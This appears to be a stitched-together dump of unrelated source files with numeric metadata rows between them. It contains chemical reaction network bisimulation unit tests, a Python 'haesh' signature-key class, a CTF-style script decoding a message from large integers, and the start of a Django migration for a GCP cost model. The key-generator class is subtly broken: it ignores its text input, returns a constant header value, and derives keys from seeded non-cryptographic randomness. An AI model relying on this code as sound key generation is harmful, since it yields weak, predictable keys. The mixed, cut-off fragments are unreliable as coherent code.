i34 <=> i38
i38 <=> i39
i39 -> B_2_
i39 -> i34
i43 -> i25
i49 -> i25 """
fcrn, fs = parse_crn(fcrn)
icrn, _ = parse_crn(icrn)
partial = {'A': ['A'], 'B_1_': ['B'], 'B_2_': ['B']}
v, i = crn_bisimulation_test(fcrn, icrn, fs, interpretation = partial)
assert v
@unittest.skipIf(SKIP_DEBUG, "skipping tests for debugging")
class ModularBisimulationTests(unittest.TestCase):
def test_qian_roessler_modular(self):
fcrns, fs = parse_crn('tests/crns/roessler_01.crn', is_file = True, modular = True)
icrns, _ = parse_crn('tests/crns/icrns/roessler_qian2011_modular.crn', is_file = True, modular = True)
partial = {sp: [sp] for sp in fs}
backup = {sp: [sp] for sp in fs}
v, i = modular_crn_bisimulation_test(fcrns, icrns, fs, partial)
self.assertTrue(v)
self.assertDictEqual(partial, backup)
with self.assertRaises(NotImplementedError):
v, i = modular_crn_bisimulation_test(fcrns, icrns, fs)
def test_qian_roessler_bisimulation_with_modular_interpretation(self):
fcrns, fs = parse_crn('tests/crns/roessler_01.crn', is_file = True, modular = True)
icrns, _ = parse_crn('tests/crns/icrns/roessler_qian2011_modular.crn', is_file = True, modular = True)
partial = {sp: [sp] for sp in fs}
backup = {sp: [sp] for sp in fs}
v, i = modular_crn_bisimulation_test(fcrns, icrns, fs, partial)
self.assertTrue(v)
self.assertDictEqual(partial, backup)
fcrn, _ = parse_crn('tests/crns/roessler_01.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/roessler_qian2011.crn', is_file = True)
v, i = crn_bisimulation_test(fcrn, icrn, fs, interpretation = i)
self.assertTrue(v)
def test_modularity_example_01(self):
module = """ a <=> i1
b + i1 -> i2 + w3
i2 -> c + w4
"""
module, _ = parse_crn(module)
fsc = {'A', 'B', 'C'}
isc = {'a', 'b', 'c'}
bisim = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'i1': ['A'], 'i2': ['C'], 'w3': [], 'w4': []}
assert passes_modularity_condition(bisim, module, isc, fsc) is True
bisim = {'a': ['B'], 'b': ['A'], 'c': ['C'], 'i1': ['B'], 'i2': ['C'], 'w3': [], 'w4': []}
assert passes_modularity_condition(bisim, module, isc, fsc) is True
bisim = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'i1': ['A'], 'i2': ['A','B'], 'w3': [], 'w4': []}
assert passes_modularity_condition(bisim, module, isc, fsc) is False
def test_modularity_example_02(self):
module = """ b <=> e1
e1 -> e2 + e3 + e4
e4 -> e1 + e5
"""
module, _ = parse_crn(module)
fsc = {'B'}
isc = {'b'}
minter = {'b': ['B'], 'e1': ['B'], 'e2': [], 'e3': [], 'e4': [], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is True
minter = {'b': ['B'], 'e1': ['B'], 'e2': [], 'e3': [], 'e4': ['B'], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is True
minter = {'b': ['B'], 'e1': ['B', 'B'], 'e2': [], 'e3': [], 'e4': [], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is False
minter = {'b': ['B'], 'e1': ['B'], 'e2': ['B'], 'e3': [], 'e4': [], 'e5': []}
assert passes_modularity_condition(minter, module, isc, fsc) is False
isc = {'b', 'e2'}
assert passes_modularity_condition(minter, module, isc, fsc) is True
isc = {'b', 'e5'}
minter = {'b': ['B'], 'e1': [], 'e2': [], 'e3': [], 'e4': [], 'e5': ['B']}
assert passes_modularity_condition(minter, module, isc, fsc) is True
minter = {'b': ['B'], 'e1': ['B'], 'e2': ['B'], 'e3': [], 'e4': [], 'e5': ['B']}
assert passes_modularity_condition(minter, module, isc, fsc) is False
def test_modularity_example_03(self):
module = """
a <=> e6
a <=> e1
a + e6 <=> e1
"""
module, _ = parse_crn(module)
fsc, isc = {'A'}, {'a'}
inter = {'a': ['A'], 'e1': ['A', 'A'], 'e6': ['A']}
assert passes_modularity_condition(inter, module, isc, fsc) is True
def test_modules(self):
fcrn1 = "A -> B"
fcrn2 = "C -> D"
icrn1 = "a + x -> b; <=> x"
icrn2 = "c + y -> d; <=> y"
icrn3a = "x + y <=> z"
icrn3b = "x + y <=> z; <=> x; <=> y"
icrn3c = "x + y <=> b"
fcrn1, fs1 = parse_crn(fcrn1)
fcrn2, fs2 = parse_crn(fcrn2)
icrn1, _ = parse_crn(icrn1)
icrn2, _ = parse_crn(icrn2)
icrn3a, _ = parse_crn(icrn3a)
icrn3b, _ = parse_crn(icrn3b)
inter = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'x': [], 'y': []}
inter2 = {'a': ['A'], 'b': ['B'], 'c': ['C'], 'd': ['D'], 'x': [], 'y': [], 'z': []}
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2])
assert v
assert i == inter
with self.assertRaises(NotImplementedError):
# This one would actually pass, but is disabled for now.
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2, icrn3a])
assert v
assert i == inter2
with self.assertRaises(NotImplementedError):
# This one would actually pass, but is disabled for now.
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2, icrn3b])
assert v
assert i == inter2
with self.assertRaises(NotImplementedError):
# This one would actually pass, but is disabled for now.
v, i = modular_crn_bisimulation_test([fcrn1, fcrn2], [icrn1, icrn2, icrn3c])
assert v is False
@unittest.skipIf(SKIP_SLOW or SKIP_DEBUG, "skipping tests for debugging")
class SlowBisimulationTests(unittest.TestCase):
def test_QingDong_crn6_i1_gs(self):
# NOTE: under 3 minutes.
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_01 = {'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter_01, permissive = 'graphsearch')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = inter_01, permissive = 'graphsearch'))
assert len(getall) == 3
#print()
#for e, b in enumerate(getall):
# print(e, {k: v for k, v in sorted(b.items())})
i1 = {'A': ['A'], 'B': ['B'], 'C': [], 'X': ['X'], 'Y': ['Y'], 'i119': ['A', 'B', 'X'], 'i120': [], 'i14': [], 'i1457': [], 'i15': [],
'i194': [], 'i2232': ['A'], 'i2300': ['A'], 'i2340': ['C'], 'i2392': [], 'i3032': ['C'], 'i394': ['X', 'X', 'Y'], 'i575': ['X'], 'i599': ['C'], 'i631': [],
'i73': ['B'], 'i778': ['Y'], 'i842': ['A', 'X', 'Y'], 'i886': [], 'i969': []}
i2 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'X': ['X'], 'Y': ['Y'], 'i119': ['A', 'B', 'X'], 'i120': [], 'i14': [], 'i1457': [], 'i15': [],
'i194': [], 'i2232': ['A'], 'i2300': ['A', 'C'], 'i2340': [], 'i2392': [], 'i3032': [], 'i394': ['X', 'X', 'Y'], 'i575': ['X'], 'i599': ['C'], 'i631': [],
'i73': ['B'], 'i778': ['Y'], 'i842': ['A', 'X', 'Y'], 'i886': [], 'i969': []}
i3 = {'A': ['A'], 'B': ['B'], 'C': [], 'X': ['X'], 'Y': ['Y'], 'i119': ['A', 'B', 'X'], 'i120': [], 'i14': [], 'i1457': [], 'i15': [],
'i194': [], 'i2232': ['A'], 'i2300': ['A', 'C'], 'i2340': [], 'i2392': ['C'], 'i3032': ['C'], 'i394': ['X', 'X', 'Y'], 'i575': ['X'], 'i599': ['C'], 'i631': [],
'i73': ['B'], 'i778': ['Y'], 'i842': ['A', 'X', 'Y'], 'i886': [], 'i969': []}
def test_QingDong_crn6_i1_bf(self):
# NOTE: under 3 minutes.
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_01 = {'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter_01, permissive = 'bruteforce')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = inter_01, permissive = 'bruteforce'))
assert len(getall) == 3
def test_QingDong_crn6_gs(self):
# NOTE: 17.5 hours
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, permissive = 'graphsearch')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, permissive = 'graphsearch'))
assert len(getall) == 5
def test_QingDong_crn6_bf(self):
# NOTE: 17.5 hours
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
#v, _ = crn_bisimulation_test(fcrn, icrn, fs, permissive = 'bruteforce')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, permissive = 'bruteforce'))
assert len(getall) == 5
def test_qian_roessler_full_gs(self):
# TODO: 2 days 17 hours
(fcrn, fs) = parse_crn('tests/crns/roessler_01.crn', is_file = True)
(icrn, _) = parse_crn('tests/crns/icrns/roessler_qian2011.crn', is_file = True)
partial = {sp: [sp] for sp in fs}
#v, i = crn_bisimulation_test(fcrn, icrn, fs, partial, permissive = 'graphsearch')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = partial, permissive = 'graphsearch'))
assert len(getall) == 12
def test_qian_roessler_full_bf(self):
# TODO: 2 days 17 hours
(fcrn, fs) = parse_crn('tests/crns/roessler_01.crn', is_file = True)
(icrn, _) = parse_crn('tests/crns/icrns/roessler_qian2011.crn', is_file = True)
partial = {sp: [sp] for sp in fs}
#v, i = crn_bisimulation_test(fcrn, icrn, fs, partial, permissive = 'bruteforce')
#self.assertTrue(v)
getall = list(crn_bisimulations(fcrn, icrn, interpretation = partial, permissive = 'graphsearch'))
assert len(getall) == 12
# And those are the solutions ...
i0 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i1 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i2 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i3 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i4 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i5 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i6 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i7 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i8 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i9 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i10 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i11 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
@unittest.skipIf(True, "testing somewhat similar to loopsearch algorithm.")
class LoopsearchBisimulationTests(unittest.TestCase):
def test_QingDong_crn6_i02_ls(self):
# NOTE: takes 22 hours... probably a bug!
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_02 = {'i842': ['Y', 'X', 'A'],
'i394': ['X', 'Y', 'X'],
'i119': ['X', 'B', 'A'],
'i2300': ['A', 'C'],
'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter_02, permissive = 'loopsearch')
self.assertTrue(v)
def test_QingDong_crn6_i1_ls(self):
# TODO: does not finish ... probably a bug!
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_01 = {'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter_01,
permissive = 'loopsearch')
self.assertTrue(v)
def test_QingDong_crn6_ls(self):
# TODO: test again after i1 and i2 terminate.
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, permissive = 'loopsearch')
self.assertTrue(v)
if __name__ == '__main__':
unittest.main()
| 44.103147 | 208 | 0.414569 | 8,810 | 75,681 | 3.456073 | 0.055846 | 0.017998 | 0.008572 | 0.026668 | 0.815226 | 0.782941 | 0.75647 | 0.71673 | 0.694266 | 0.646282 | 0 | 0.061702 | 0.345569 | 75,681 | 1,715 | 209 | 44.128863 | 0.553061 | 0.046696 | 0 | 0.556246 | 0 | 0 | 0.158171 | 0.009789 | 0 | 0 | 0 | 0.000583 | 0.21256 | 1 | 0.043478 | false | 0.055901 | 0.002761 | 0 | 0.05314 | 0.020014 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
3d47ee59d2b01dc2c0ca4844f4c1b82592af1e25 | 1,484 | py | Python | haesh/util.py | VincentHokie/haesh | 5d6eb19d6836a8f94181a33f27c3ffce98c43548 | [
"MIT"
] | null | null | null | haesh/util.py | VincentHokie/haesh | 5d6eb19d6836a8f94181a33f27c3ffce98c43548 | [
"MIT"
] | null | null | null | haesh/util.py | VincentHokie/haesh | 5d6eb19d6836a8f94181a33f27c3ffce98c43548 | [
"MIT"
] | null | null | null | import os
import random
RANGE_MIN = 1
RANGE_MAX = 1000
class HaeshKeyGenerator(object):
def __init__(self, file_path, text):
self._file_path = file_path
self._text = text
def get_text_signature_key(self):
file_size = self._get_file_size_int_signature()
mod_time = self._get_file_modification_time_int_signature()
file_header = self._get_file_header_int_signature()
key = f'{file_size}{mod_time}{file_header}'
return key.encode(encoding = 'UTF-8')
def get_file_signature_key(self):
file_size = self._get_file_size_int_signature()
mod_time = self._get_file_modification_time_int_signature()
file_header = self._get_file_header_int_signature()
key = f'{file_size}{mod_time}{file_header}'
return key.encode(encoding = 'UTF-8')
def _get_file_size_int_signature(self):
size = os.path.getsize(self._file_path)
random.seed(size)
random_int = random.randint(RANGE_MIN, RANGE_MAX)
return f'{random_int:04}'
def _get_file_modification_time_int_signature(self):
time = os.path.getmtime(self._file_path)
random.seed(time)
random_int = random.randint(RANGE_MIN, RANGE_MAX)
return f'{random_int:04}'
def _get_file_header_int_signature(self):
time = os.path.getmtime(self._file_path)
random.seed(time)
random_int = random.randint(RANGE_MIN, RANGE_MAX)
return f'{0:08}'
| 32.977778 | 67 | 0.68531 | 207 | 1,484 | 4.458937 | 0.188406 | 0.07584 | 0.071506 | 0.045504 | 0.824485 | 0.776815 | 0.75948 | 0.75948 | 0.75948 | 0.75948 | 0 | 0.012079 | 0.219003 | 1,484 | 44 | 68 | 33.727273 | 0.784297 | 0 | 0 | 0.542857 | 0 | 0 | 0.076819 | 0.045822 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171429 | false | 0 | 0.057143 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e9fcd2f820cb41fd8c2698188d2a3c8973c76cba | 8,017 | py | Python | CTFR-Penyelesaian/018 Warna warni 2/warna warni 2/decode.py | dimasma0305/PicoCTF-Penyelesaian | 69c315b269412c766d91bc909b75c8bbfebdc12c | [
"MIT"
] | 1 | 2022-01-01T14:37:49.000Z | 2022-01-01T14:37:49.000Z | CTFR-Penyelesaian/018 Warna warni 2/warna warni 2/decode.py | dimasma0305/PicoCTF-Penyelesaian | 69c315b269412c766d91bc909b75c8bbfebdc12c | [
"MIT"
] | null | null | null | CTFR-Penyelesaian/018 Warna warni 2/warna warni 2/decode.py | dimasma0305/PicoCTF-Penyelesaian | 69c315b269412c766d91bc909b75c8bbfebdc12c | [
"MIT"
] | 1 | 2021-12-30T07:48:32.000Z | 2021-12-30T07:48:32.000Z | flag = [3752536516130773641885711225353928704, 5117095249269236784389606216391720960, 5312032211146160090461591215111405568, 5117095249269236784389606216391720960, 5360766451615390916979587464791326720, 1559495695015386448575879989757476864, 5604437653961545049569568713190932480, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 5019626768330775131353613717031878656, 4727221325515390172245636218952351744, 5165829489738467610907602466071642112, 4727221325515390172245636218952351744, 1559495695015386448575879989757476864, 5312032211146160090461591215111405568, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 4727221325515390172245636218952351744, 5312032211146160090461591215111405568, 4775955565984620998763632468632272896, 4727221325515390172245636218952351744, 5068361008800005957871609966711799808, 5214563730207698437425598715751563264, 4727221325515390172245636218952351744, 5360766451615390916979587464791326720, 1559495695015386448575879989757476864, 4775955565984620998763632468632272896, 4922158287392313478317621217672036352, 4775955565984620998763632468632272896, 4922158287392313478317621217672036352, 5555703413492314223051572463511011328, 4727221325515390172245636218952351744, 5458234932553852570015579964151169024, 4727221325515390172245636218952351744, 1559495695015386448575879989757476864, 5214563730207698437425598715751563264, 4727221325515390172245636218952351744, 5263297970676929263943594965431484416, 5117095249269236784389606216391720960, 5312032211146160090461591215111405568, 4727221325515390172245636218952351744, 5653171894430775876087564962870853632, 1559495695015386448575879989757476864, 4873424046923082651799624967992115200, 5117095249269236784389606216391720960, 5604437653961545049569568713190932480, 5117095249269236784389606216391720960, 5360766451615390916979587464791326720, 5117095249269236784389606216391720960, 1559495695015386448575879989757476864, 4727221325515390172245636218952351744, 5019626768330775131353613717031878656, 4727221325515390172245636218952351744, 5555703413492314223051572463511011328, 1559495695015386448575879989757476864, 5312032211146160090461591215111405568, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 4824689806453851825281628718312194048, 4922158287392313478317621217672036352, 5019626768330775131353613717031878656, 4727221325515390172245636218952351744, 5068361008800005957871609966711799808, 1559495695015386448575879989757476864, 3216459870969234550187752478874796032, 5555703413492314223051572463511011328, 5701906134900006702605561212550774784, 5653171894430775876087564962870853632, 4922158287392313478317621217672036352, 4970892527861544304835617467351957504, 5409500692084621743497583714471247872, 5555703413492314223051572463511011328, 4824689806453851825281628718312194048, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 2826585947215387938043782481435426816, 3313928351907696203223744978234638336, 2241775061584618019827827485276372992, 1559495695015386448575879989757476864, 3216459870969234550187752478874796032, 5653171894430775876087564962870853632, 5799374615838468355641553711910617088, 1559495695015386448575879989757476864, 5068361008800005957871609966711799808, 4922158287392313478317621217672036352, 5555703413492314223051572463511011328, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 5117095249269236784389606216391720960, 5604437653961545049569568713190932480, 1559495695015386448575879989757476864, 5896843096776930008677546211270459392, 5409500692084621743497583714471247872, 5701906134900006702605561212550774784, 5555703413492314223051572463511011328, 1559495695015386448575879989757476864, 4970892527861544304835617467351957504, 5263297970676929263943594965431484416, 4727221325515390172245636218952351744, 5019626768330775131353613717031878656, 1559495695015386448575879989757476864, 2826585947215387938043782481435426816, 1559495695015386448575879989757476864, 3265194111438465376705748728554717184, 4093676199415389427511684973113376768, 3411396832846157856259737477594480640, 3996207718476927774475692473753534464, 5994311577715391661713538710630301696, 2534180504400002978935804983355899904, 2582914744869233805453801233035821056, 2582914744869233805453801233035821056, 2485446263930772152417808733675978752, 5312032211146160090461591215111405568, 4775955565984620998763632468632272896, 5263297970676929263943594965431484416, 5896843096776930008677546211270459392, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 5360766451615390916979587464791326720, 2582914744869233805453801233035821056, 5653171894430775876087564962870853632, 5555703413492314223051572463511011328, 5701906134900006702605561212550774784, 4824689806453851825281628718312194048, 5653171894430775876087564962870853632, 2387977782992310499381816234316136448, 2339243542523079672863819984636215296, 5360766451615390916979587464791326720, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 5360766451615390916979587464791326720, 2582914744869233805453801233035821056, 2387977782992310499381816234316136448, 4873424046923082651799624967992115200, 2485446263930772152417808733675978752, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 5312032211146160090461591215111405568, 2534180504400002978935804983355899904, 5019626768330775131353613717031878656, 2485446263930772152417808733675978752, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 4970892527861544304835617467351957504, 4629752844576928519209643719592509440, 5896843096776930008677546211270459392, 2339243542523079672863819984636215296, 5701906134900006702605561212550774784, 4629752844576928519209643719592509440, 5555703413492314223051572463511011328, 2485446263930772152417808733675978752, 2534180504400002978935804983355899904, 4873424046923082651799624967992115200, 4629752844576928519209643719592509440, 5117095249269236784389606216391720960, 5653171894430775876087564962870853632, 6091780058653853314749531209990144000, 2241775061584618019827827485276372992, 1559495695015386448575879989757476864, 3752536516130773641885711225353928704, 4727221325515390172245636218952351744, 4727221325515390172245636218952351744, 4970892527861544304835617467351957504, 1559495695015386448575879989757476864, 5360766451615390916979587464791326720, 5117095249269236784389606216391720960, 5068361008800005957871609966711799808, 5068361008800005957871609966711799808, 1559495695015386448575879989757476864, 4824689806453851825281628718312194048, 5068361008800005957871609966711799808, 4727221325515390172245636218952351744, 5263297970676929263943594965431484416, 5263297970676929263943594965431484416, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 5019626768330775131353613717031878656, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 5360766451615390916979587464791326720, 5896843096776930008677546211270459392, 4727221325515390172245636218952351744, 1559495695015386448575879989757476864, 4873424046923082651799624967992115200, 5117095249269236784389606216391720960, 1559495695015386448575879989757476864, 5555703413492314223051572463511011328, 4922158287392313478317621217672036352, 5312032211146160090461591215111405568, 4727221325515390172245636218952351744, 5214563730207698437425598715751563264, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 5653171894430775876087564962870853632, 5555703413492314223051572463511011328, 5409500692084621743497583714471247872, 5604437653961545049569568713190932480, 5604437653961545049569568713190932480, 1559495695015386448575879989757476864, 2826585947215387938043782481435426816, 1949369618769233060719849987196846080]
bagi = 48734240469230826517996249679921152
res = []
for i in range(len(flag)):
res.append(int(flag[i]/bagi))
for i in range(len(res)):
print(chr(res[i]), end='') | 1,002.125 | 7,846 | 0.942248 | 228 | 8,017 | 33.131579 | 0.241228 | 0.039185 | 0.029388 | 0.039185 | 0.003707 | 0 | 0 | 0 | 0 | 0 | 0 | 0.959302 | 0.02844 | 8,017 | 8 | 7,847 | 1,002.125 | 0.010528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
18084de3d9a6c6eb8ab988ae0f6b5f439d237d81 | 5,361 | py | Python | koku/reporting/migrations/0160_auto_20210114_1548.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 2 | 2022-01-12T03:42:39.000Z | 2022-01-12T03:42:40.000Z | koku/reporting/migrations/0160_auto_20210114_1548.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0160_auto_20210114_1548.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 1 | 2021-07-21T09:33:59.000Z | 2021-07-21T09:33:59.000Z | # Generated by Django 3.1.3 on 2021-01-14 15:48
import django.contrib.postgres.fields
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [("reporting", "0159_gcp_cost_summary")]
operations = [
migrations.CreateModel(
name="GCPCostSummary",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
],
